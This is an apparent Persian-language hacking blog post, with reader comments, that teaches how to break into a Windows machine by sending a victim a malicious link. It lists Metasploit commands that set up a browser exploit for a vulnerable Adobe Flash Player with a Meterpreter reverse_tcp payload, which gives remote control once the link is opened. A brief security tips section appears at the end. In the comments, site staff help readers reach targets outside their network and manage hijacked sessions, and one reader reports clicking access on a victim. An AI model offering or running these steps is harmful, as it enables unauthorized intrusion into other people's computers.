هک ویندوز با ارسال لینک و امنیت
در این اموزش با تحوه هک با لینک اشنا میشوید که اینکار با استفاده از ابزار متاسپلویت برای نفوذ به ویندوز انجام میشود با ما در ادامه این اموزش هک و امنیت همراه باشید
هک با لینک از طریق اسیب پذیری Adobe Flash Player
یکی از راه های نفوذ به به یک سیستم از طریق باز کردن لینک است برای درک بهتر به توضیحات زیر توجه کنید
اگر بخواهیم به سیستم یک کاربر که دارای سیستم عامل ویندوز است نفوذ کنیم راه های زیادی داریم
مانند استفاده از رات ها ، کیلاگر ها ، اسیب پذیری های سیستم عامل و … که این روش ها در اموزش های قبلی توضیح داده شده است
و میتوانید با کمی جستجو در سایت به ان ها دسترسی داشته باشید اما راه دیگری که در این اموزش به ان میپردازیم هک با لینک است
یعنی برای کاربر یک لینک الوده ارسال میکنیم تا با باز کردن ان به سیستم شخص دسترسی پیدا کنیم و بتوانیم دستورات خود را اجرا کنیم
این کار را با استفاده از ابزار معروف و محبوب متاسپلویت در کالی لینوکس انجام میدهیم
نفوذ با لینک به ویندوز
ابتدا Metasploit خود را اجرا کنید
msfconsole
وارد اکسپلویت مرورگر مورد نظر شوید
use exploit/multi/browser/adobe_flash_shader_drawing_fill
نکته : این اکسپلویت با استفاده از اسیب پذیری فلش پلیر کار میکند و باید حتما نسخه اسیب پذیر ان نصب باشد
با دستورات زیر ip خود را ست کنید
set SRVHOST 127.0.0.1
پورت مورد نظر خود را وارد کنید (به صورت پیشفرض 8080 میباشد)
set SRVPORT 6060
در صورتی که بخواهید میتوانید ssl را بر روی true بگذارید تا لینک با https باز شود
پیلود زیر را ست کنید
set PAYLOAD windows/meterpreter/reverse_tcp
حال با دستور run اکسپلویت را اجرا کنید
یک لینک به شما داده میشود که با ارسال به کاربر مورد نظر و اجرای ان دسترسی meterpreter خواهید داشت
و میتوانید دستورات خود را برای کنترل سیستم از راه دور وارد نمایید
در صورتی که سیستم کاربر اسیب پذیر نباشد هک با لینک از این روش جوابگو نخواهد بود
روش های دیگری برای نفوذ با لینک وجود دارد مانند استفاده از ابزار beef که اموزش ویدیو ان را قرار داده ایم و میتوایند مشاهده کنید
امنیت
از بازکردن لینک های نامطمئن خودداری کنید
از سند باکس استفاده کنید (اموزش سند باکس را از دست ندهید)
سیستم عامل و نرم افزار های خود را بروز نگهدارید
امیدواریم اموزش نفوذ با لینک به ویندوز برای شما مفید واقع شده باشد
در صورت هرگنه سوال و ابهام در رابطه با این اموزش از بخش دیدگاه مطرح کنید
موفق و پیروز باشید.
۱۸ دیدگاه در “هک ویندوز با ارسال لینک و امنیت”
این روش روی lanجواب میده یا روی wan
درود
از این روش در هر جای از شبکه میتوانید استفاده کنید حتی اگر شبکه شما داخلی هم باشد به شرطی که تارگت شما هم داخل همان شبکه باشد میتوانید از این روش استفاده کنید
دستور های بعد دسترسی رو هم میشه بگین
درود
می توایند از سویچ help استفاده کنید ، بزودی این مورد را هم به اموزش اضافه خواهیم کرد.
البته این موضوع در دوره اموزش کالی لینوکس به صورت کامل اموزش داده شده است.
خارج از شبکه هم کار میکند؟
درود
بله.
جناب وقتی لینک فرستادیم برای طرف و زد روی لینک ما چجوری اطلاعات طرف بدست بیاریم دستوراتش چیه
اگه میشه کدهای بعد دسترسی رو هم قرار بدید
سلام خسه نباشید
میشه لطفا فیلمشو بزارید
؟
من انجام دادم موفق نشدم
وقتی قربانی کلیک کرد دسترسی گرفتم یه ipconfig از سیستم گرفتم و کارت شبکشو دیدم و سریع قطع شدم
ببخشید برای من ارور میده که این پورت و این هاست fail شده و میگه که در حال استفاده است من باید دقیقا از چه پورت و هاستی استفاده کنم؟
درود
یک پورت دیگر از بین ۱ تا ۶۵۵۳۵ انتخاب کنید.
سلام من به ویندوز تست نفوذ کردم ولی وقتی ترمینال رو میبندم
و وقتی وارد ترمینال میشم چجوری دسترسی رو بالا بیارم
یا باید دوباره بزنه رو لینک؟ لطفا جواب بدید
درود
با دستور sessions می توانید کلاینت های خود را ببنید.
سلام خسته نباشید من میسازم پیلود و … رو ولی رو ویندوز که از خونمون فاصله داره کار نمیکنه
درود و تشکر
اموزش پورت فورواردینگ را مشاهده کنید.
سلام وقتتون بخیر من یدونه اکسپلویت مخصوص ایفون درست کردم و پایلودی که خودش گفته بود رو نوشتم براش و روی گوشی خودم گذاشتم پیام هم اومد که فلان ای پی وارد شد اما وقتی که دستور sessionرو میزنم میاره که هیچی اکتیو نیست در صورتی که مراحل بدون خطا رفتم اگه میشه مشکل رو بگید یا چه کدی باید بزنم؟(صرفا جهت تست و نفوذ به گوشی خودم)
با تشکر از سایت خوب و مفیدتون
درود و تشکر
اموزشی درباره این موضوع در وب سایت وجود دارد از بخش جستجو ان را مشاهده کنید اگر با ان هم مشکلی داشتید در همان پست مرتبط سوال بفرمایید.
پیداش نکردم اگه امکان داره ممنون میشم لینکش رو بذارید